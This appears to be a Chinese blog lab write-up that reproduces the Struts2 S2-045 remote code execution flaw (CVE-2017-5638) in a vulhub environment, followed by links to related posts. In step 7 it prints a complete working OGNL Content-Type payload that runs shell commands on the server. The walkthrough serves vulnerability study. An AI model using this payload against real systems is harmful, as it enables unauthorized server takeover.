vulhub-S2-045 远程代码执行漏洞(CVE-2017-5638)

原创 已于 2023-09-11 21:45:12 修改 · 412 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全

于 2023-09-09 14:23:19 首次发布
本文详细描述了Struts2框架的S2-045远程代码执行漏洞(CVE-2017-5638),涉及恶意值触发的RCE攻击,影响多个版本。攻击者可通过特定Content-Type和OGNL表达式执行命令,提示如何搭建靶场和利用漏洞获取目标信息。

S2-045 远程代码执行漏洞(CVE-2017-5638)

1.漏洞网址

https://vulhub.org/#/environments/struts2/s2-045/

2.漏洞描述

可以使用恶意值执行 RCE 攻击。如果该值无效,则会引发异常,然后使用该异常向用户显示错误消息。Content-Type``Content-Type

3.受影响的版本

Struts 2.3.5 - Struts 2.3.31
Struts 2.5  - Struts 2.5.10

4.靶场搭建

image-20230909103810650

image-20230909103916420

image-20230909104442960

5.将bp中的数据包发送到的repeter

image-20230909104858502

image-20230909104832669

6.在repeater模块修改数据包,验证是否存在RCE 漏

image-20230909105404748

Content-Type:
%       {#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)} 是一个 OGNL 表达式,用于修改当前请求的 HttpServletResponse 对象的响应头。通过调用 addHeader 方法,它将设置一个新的响应头字段,名称为 "vulhub",值为 "54289"。
.multipart/form-data 是指定请求的 Content-Type 类型为 multipart/form-data,表示请求是一个多部分表单数据。

image-20230909105851571

7.经过上述步骤说明存在RCE漏洞,在Content-type 那里输入下述代码,获得目标信息

"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ip a').(#iswin=
(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

8.出现root则表示执行成功。

image-20230909111121828

9/出现ip表示执行成功

image-20230909111230125

9/出现ip表示执行成功

[外链图片转存中…(img-r2CRZuMV-1694240577132)]

pP6WwSH.md.png

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045CVE-2017-5638
qq_51577576的博客
10-17 925
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045CVE-2017-5638) 在使用基于Jakarta插件的文件上传功能时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1656
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
Struts2 漏洞复现之s2-045
weixin_51220765的博客
12-14 3187
Struts2 漏洞复现之s2-045 原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响版本: Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 1.进入045 cd vulhub-master/struts2/s2-045 2.开启045 docker-compose up -d
漏洞利用(CVE-2017-5638
weixin_46663807的博客
06-14 2349
漏洞利用 **实验准备:**一台Kali主机(攻击机),一台ubuntu主机(靶机),Ubuntu中包含docker,并包含vulhub/struts2:2.3镜像 1、开启Ubuntu,将容器8080映射8888端口 docker run -it -d -p 8888:8080 vulhub/struts2:2.3.30 2、扫描主机,查看是否存在漏洞 在docker中开启Nessus, ...
Apache Shrio反序列化漏洞
Hacker_LaoYi的博客
01-15 704
为了防止反序列化漏洞的发生,可以禁用默认的序列化器,并使用安全的反序列化库,例如Apache Commons Collections库中的SafeSerializable类。3.使用安全的反序列化库:安全的反序列化库可以提供更好的安全性,以防止反序列化漏洞的发生。总之,Apache Shiro反序列化漏洞的修复方案包括升级到受影响的版本、禁用默认的序列化器、使用安全的反序列化库、输入验证和过滤以及采取安全编码实践等措施。要复现该漏洞,需要构造一个恶意的序列化数据,并将其传递给Shiro的序列化函数。
struts2 S2-045漏洞
qzxdh的专栏
03-07 6454
Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。 漏洞编号:  CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述:
S2-045 远程代码执行漏洞CVE-2017-5638
qq_43665434的博客
03-28 1031
S2-045 远程代码执行漏洞CVE-2017-5638) ​ struts2是基于MVC设计模式的Java Web框架技术之一,struts2框架按照MVC的设计思想把Java Web应用程序分为控制层,包括核心控制器FilterDispatcher和业务控制器Action,模型层,包括业务逻辑组件和数据库访问组件,视图层,包括HTML、JSP、struts2标签等。 The Jakarta Multipart parser in Apache Struts 2 2.3.x before
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638
qq_51577576的博客
11-20 1128
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-046(CVE-2017-5638) Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805)
qq_51577576的博客
12-15 2012
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1520
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
Apache Struts2(S2-045漏洞升级指南
03-07
Apache Struts2(S2-045漏洞升级指南,用于指导Apache Struts2(S2-045漏洞的本地升级工作
Struts2 045漏洞S2-045漏洞利用工具python 视图版
03-07
Struts2 045漏洞S2-045漏洞利用工具python 视图版 执行python exp.py后 自动弹出对话框
s2-045漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出现了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
Struts2 S2-045 远程代码执行漏洞CVE-2017-5638
qq_68163788的博客
06-24 2213
Struts2是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet当基于Jakarta插件上传文件时,可导致远程代码执行
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
m0_62008601的博客
07-31 2381
struts2重要漏洞之一
S2-045漏洞复现
不曾扬帆,何以至远方
07-14 2333
S2-045(CVE-2017-5638)漏洞复现
S2-045 Struts 2漏洞CVE-2017-5638) 实战
shylcok的博客
08-11 961
公司接到阿里云需要升级Struts 2的邮件,因为 我们公司用的 Struts 2版本 有远程代码执行漏洞。但是 如果执行一些和文件,目录相关的操作 就会提示: 没有那个文件或目录。1.抓包,使用bp或者Charles都行 (我这使用Charles)现在可以执行查看路径等一些权限,但是还做不到删除,新增等一些操作。重要的是,下图中 Content-Type的内容 进行修改。2.改包(1.打断点2.repeat一下3修改需要修改的)当中的重点就是加粗字体:(#cmd='"ls"')......
复现S2-045远程代码执行漏洞
DXfighting_的博客
04-15 1706
使用docker启动环境 访问 使用burpsuite抓包修改如图请求包,验证漏洞
Struts2 漏洞(S2-045/CVE-2017-5638)复现
最新发布
10-31
用户明确要求复现S2-045漏洞CVE-2017-5638)。 根据引用[4]:该漏洞影响范围是使用基于Jakarta插件的文件上传功能时,通过修改HTTP请求头中的Content-Type值来触发漏洞。 引用[5]给出了具体的利用代码,是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值